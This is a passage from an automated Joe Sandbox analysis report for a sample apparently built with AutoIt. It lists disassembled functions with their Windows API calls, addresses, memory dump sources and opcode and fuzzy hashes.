                                    • Opcode ID: a767eb83a3b3c9a940b6cb17e47f2a1842a2f5206b41d6e9aa3bfb4de8d9d2c1
                                    • Instruction ID: 430f865917db06b1cb1757475800346fc159ec422d0a62a20f5c1bb0595348bf
                                    • Opcode Fuzzy Hash: a767eb83a3b3c9a940b6cb17e47f2a1842a2f5206b41d6e9aa3bfb4de8d9d2c1
                                    • Instruction Fuzzy Hash: B511822169025D79D720B766DC4ADFB6E7CFBD2B00F000829B411E21D0EAB81915C6B1
                                    Function 007E5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 007E5CE2
                                    • GetWindowRect.USER32(00000000,?), ref: 007E5CFB
                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007E5D59
                                    • GetDlgItem.USER32(?,00000002), ref: 007E5D69
                                    • GetWindowRect.USER32(00000000,?), ref: 007E5D7B
                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 007E5DCF
                                    • GetDlgItem.USER32(?,000003E9), ref: 007E5DDD
                                    • GetWindowRect.USER32(00000000,?), ref: 007E5DEF
                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 007E5E31
                                    • GetDlgItem.USER32(?,000003EA), ref: 007E5E44
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007E5E5A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007E5E67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 947edab8ba2f6c33f82b19a0da30e5740159b0a1d3d67fc99f3cd4bc3919a05a
                                    • Instruction ID: 5cdf3376949d86c1e1c864c01b7d0dee458c3334cee1efa52fa6fac56ed9b8d9
                                    • Opcode Fuzzy Hash: 947edab8ba2f6c33f82b19a0da30e5740159b0a1d3d67fc99f3cd4bc3919a05a
                                    • Instruction Fuzzy Hash: 4E510D71B40609AFDB18CF69DD89AAEBBB9FF48314F148229F515E7290D7749E00CB50
                                    Function 00798BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00798F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00798BE8,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 00798FC5
                                    • DestroyWindow.USER32(?), ref: 00798C81
                                    • KillTimer.USER32(00000000,?,?,?,?,00798BBA,00000000,?), ref: 00798D1B
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 007D6973
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 007D69A1
                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 007D69B8
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00798BBA,00000000), ref: 007D69D4
                                    • DeleteObject.GDI32(00000000), ref: 007D69E6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 641708696-0
                                    • Opcode ID: f19d8bd0dd2b7920103b598d884955ed8078571df99645b02ace1f62412f2bb8
                                    • Instruction ID: b1b578d2a99c089d82d255e94e894245984aa7620796635acad4cb5e034a81e3
                                    • Opcode Fuzzy Hash: f19d8bd0dd2b7920103b598d884955ed8078571df99645b02ace1f62412f2bb8
                                    • Instruction Fuzzy Hash: 57617C30502700DFCF659F14E958B65BBF1FF46312F54895DE0829BAA0CB79AD90CBA2
                                    Function 00799838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799944: GetWindowLongW.USER32(?,000000EB), ref: 00799952
                                    • GetSysColor.USER32(0000000F), ref: 00799862
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: e22cc3f4cb65e67d30134f8e7f15d2be126b04dd1391c08dccfdd6598360d8c4
                                    • Instruction ID: 50ee41b48b99b32eadd47a11da9ebc04082f6cec8822c8db2b3ba8006d633c8c
                                    • Opcode Fuzzy Hash: e22cc3f4cb65e67d30134f8e7f15d2be126b04dd1391c08dccfdd6598360d8c4
                                    • Instruction Fuzzy Hash: 85418231144640AFEF205F3CAC88BB93B69BB56371F14461DFAA2872E1E7399C41DB11
                                    Function 007E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,007CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 007E9717
                                    • LoadStringW.USER32(00000000,?,007CF7F8,00000001), ref: 007E9720
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,007CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 007E9742
                                    • LoadStringW.USER32(00000000,?,007CF7F8,00000001), ref: 007E9745
                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 007E9866
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 747408836-2268648507
                                    • Opcode ID: 63177918d80ecb0bad520fad7cb741e555133f8a1c5196aaa6ea1dddec043948
                                    • Instruction ID: ecbf6851d0cf41eef64c5b7ecba5373d0a0fd329e09e9e347ab2e3e38b84f442
                                    • Opcode Fuzzy Hash: 63177918d80ecb0bad520fad7cb741e555133f8a1c5196aaa6ea1dddec043948
                                    • Instruction Fuzzy Hash: 67413B72840219EACF04FBE0DD8ADEEB778AF59740F540025F605B2192EA2D6F49CB61
                                    Function 007E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007E07A2
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007E07BE
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007E07DA
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007E0804
                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 007E082C
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007E0837
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007E083C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 323675364-22481851
                                    • Opcode ID: 54b4ef1c4149f51c97e603ef901bda95b3905d5afb9dc0ac7d58e4d5300e9c81
                                    • Instruction ID: 7ab70941d987d6db9346f4c4bd3735fea8ed5142f38c03c1d8e594beb5b0d408
                                    • Opcode Fuzzy Hash: 54b4ef1c4149f51c97e603ef901bda95b3905d5afb9dc0ac7d58e4d5300e9c81
                                    • Instruction Fuzzy Hash: 93410672C50229EBDF11EBA4DC89CEDB778FF08750B144129E915A3161EB78AE44CBA0
                                    Function 00803C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00803C5C
                                    • CoInitialize.OLE32(00000000), ref: 00803C8A
                                    • CoUninitialize.OLE32 ref: 00803C94
                                    • _wcslen.LIBCMT ref: 00803D2D
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00803DB1
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00803ED5
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00803F0E
                                    • CoGetObject.OLE32(?,00000000,0081FB98,?), ref: 00803F2D
                                    • SetErrorMode.KERNEL32(00000000), ref: 00803F40
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00803FC4
                                    • VariantClear.OLEAUT32(?), ref: 00803FD8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                    • String ID:
                                    • API String ID: 429561992-0
                                    • Opcode ID: b60367bce64a2e0e81291a6cef8f6996729da444967629c4ff02b71cba5f8f29
                                    • Instruction ID: d10fdfd217594a2573f2250153672dca9969363bbabc43bc44589d53f0bf395b
                                    • Opcode Fuzzy Hash: b60367bce64a2e0e81291a6cef8f6996729da444967629c4ff02b71cba5f8f29
                                    • Instruction Fuzzy Hash: DCC13371608205AFD740DF68C88496BBBE9FF89748F00491DF98ADB291DB31EE05CB52
                                    Function 007F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 007F7AF3
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007F7B8F
                                    • SHGetDesktopFolder.SHELL32(?), ref: 007F7BA3
                                    • CoCreateInstance.OLE32(0081FD08,00000000,00000001,00846E6C,?), ref: 007F7BEF
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007F7C74
                                    • CoTaskMemFree.OLE32(?,?), ref: 007F7CCC
                                    • SHBrowseForFolderW.SHELL32(?), ref: 007F7D57
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007F7D7A
                                    • CoTaskMemFree.OLE32(00000000), ref: 007F7D81
                                    • CoTaskMemFree.OLE32(00000000), ref: 007F7DD6
                                    • CoUninitialize.OLE32 ref: 007F7DDC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                    • String ID:
                                    • API String ID: 2762341140-0
                                    • Opcode ID: 49e57361e1c1a98b990f5aa96dfcd025941afec0dbe21873b5484134e7ff34d2
                                    • Instruction ID: 1197e885310ee2fce3cb7bbd23653604fe3639aaed95b52247dbd5fceae8663a
                                    • Opcode Fuzzy Hash: 49e57361e1c1a98b990f5aa96dfcd025941afec0dbe21873b5484134e7ff34d2
                                    • Instruction Fuzzy Hash: 3EC10975A04109EFCB14DFA4C888DAEBBB9FF48314B1484A9E91ADB361D734ED41CB90
                                    Function 0081541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00815504
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00815515
                                    • CharNextW.USER32(00000158), ref: 00815544
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00815585
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0081559B
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008155AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$CharNext
                                    • String ID:
                                    • API String ID: 1350042424-0
                                    • Opcode ID: b0941a0806dddb9659874e4bcf5cd1dbcc15c482650f9f3411bc2d32b9c48fc1
                                    • Instruction ID: 974fae821ed8cd01d5ba8b6c48bd50fa9473e8371b5afe6d63d83c3fd68718d1
                                    • Opcode Fuzzy Hash: b0941a0806dddb9659874e4bcf5cd1dbcc15c482650f9f3411bc2d32b9c48fc1
                                    • Instruction Fuzzy Hash: 396159B0900608EFDF109F94DC84AFE7BBDFF99725F108149F925EA290D7748A809B61
                                    Function 007DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007DFAAF
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 007DFB08
                                    • VariantInit.OLEAUT32(?), ref: 007DFB1A
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 007DFB3A
                                    • VariantCopy.OLEAUT32(?,?), ref: 007DFB8D
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 007DFBA1
                                    • VariantClear.OLEAUT32(?), ref: 007DFBB6
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 007DFBC3
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007DFBCC
                                    • VariantClear.OLEAUT32(?), ref: 007DFBDE
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007DFBE9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 2f14dadcc3026f8ab520609654d5161cd855547bb6a58c8e228bf6a436038fc6
                                    • Instruction ID: a12e438967ee42ed6d9f33c8ff6caa0c75925f73aa4b575b6af5dce509b6e4a7
                                    • Opcode Fuzzy Hash: 2f14dadcc3026f8ab520609654d5161cd855547bb6a58c8e228bf6a436038fc6
                                    • Instruction Fuzzy Hash: C2416275A04219EFDB00DFA4D8589EDBBB9FF48354F00C06AE946A7361C734A945CFA4
                                    Function 007E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 007E9CA1
                                    • GetAsyncKeyState.USER32(000000A0), ref: 007E9D22
                                    • GetKeyState.USER32(000000A0), ref: 007E9D3D
                                    • GetAsyncKeyState.USER32(000000A1), ref: 007E9D57
                                    • GetKeyState.USER32(000000A1), ref: 007E9D6C
                                    • GetAsyncKeyState.USER32(00000011), ref: 007E9D84
                                    • GetKeyState.USER32(00000011), ref: 007E9D96
                                    • GetAsyncKeyState.USER32(00000012), ref: 007E9DAE
                                    • GetKeyState.USER32(00000012), ref: 007E9DC0
                                    • GetAsyncKeyState.USER32(0000005B), ref: 007E9DD8
                                    • GetKeyState.USER32(0000005B), ref: 007E9DEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: fb8b09983b9c3e800a52f7c676166f1cafbee68a908f473881d222a542796bc3
                                    • Instruction ID: fce8e01f1e69cfcbf4ec3d69ecd187f48a39b16422cca4c5769eae08a399e82c
                                    • Opcode Fuzzy Hash: fb8b09983b9c3e800a52f7c676166f1cafbee68a908f473881d222a542796bc3
                                    • Instruction Fuzzy Hash: 2741D8366057D969FF30D67288043F5BEA17F19344F04805ADBC6566C2EBAC99C8C7A2
                                    Function 0080055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 008005BC
                                    • inet_addr.WSOCK32(?), ref: 0080061C
                                    • gethostbyname.WSOCK32(?), ref: 00800628
                                    • IcmpCreateFile.IPHLPAPI ref: 00800636
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008006C6
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008006E5
                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 008007B9
                                    • WSACleanup.WSOCK32 ref: 008007BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: a1ac9cd48a959e2f8cc52fc5f5961a724f8c2d30b4b763bb6faaf3488c53a0f9
                                    • Instruction ID: 48748e261c66fd1e46a8ed64b4dd65789670168fd4e4ff939d5605a097118cd9
                                    • Opcode Fuzzy Hash: a1ac9cd48a959e2f8cc52fc5f5961a724f8c2d30b4b763bb6faaf3488c53a0f9
                                    • Instruction Fuzzy Hash: 1F91AB35608201AFD760DF15C888F1ABBE0FF49318F1885A9E46ADB6A2C735ED41CF91
                                    Function 00808CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 707087890-567219261
                                    • Opcode ID: 7823c99b039384c6f57095d026867b57d314b4b6566294e0b923aac925c4f5b0
                                    • Instruction ID: 8108166c837317f101ea6d9be1f038e5ff1dd56003e6c715a6cfc9f7dcd5ae6b
                                    • Opcode Fuzzy Hash: 7823c99b039384c6f57095d026867b57d314b4b6566294e0b923aac925c4f5b0
                                    • Instruction Fuzzy Hash: E451B331A00516DBCF54DF68CD408BEB7A5FF65324B214229E9A6E72C0DB35ED80C790
                                    Function 0080372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32 ref: 00803774
                                    • CoUninitialize.OLE32 ref: 0080377F
                                    • CoCreateInstance.OLE32(?,00000000,00000017,0081FB78,?), ref: 008037D9
                                    • IIDFromString.OLE32(?,?), ref: 0080384C
                                    • VariantInit.OLEAUT32(?), ref: 008038E4
                                    • VariantClear.OLEAUT32(?), ref: 00803936
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 636576611-1287834457
                                    • Opcode ID: a163a38351288f4c443826c75f808445dd36a442d52730d49602c425d1e9c690
                                    • Instruction ID: 043d4589c6218a03034ec251d5bcfab06cbda1e6e2eb4ac7b3bdbd2756e8d85c
                                    • Opcode Fuzzy Hash: a163a38351288f4c443826c75f808445dd36a442d52730d49602c425d1e9c690
                                    • Instruction Fuzzy Hash: FD617970608301AFD310DF64C889B6ABBE8FF49714F104869F995DB291D774EE48CBA2
                                    Function 007F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007F33CF
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007F33F0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
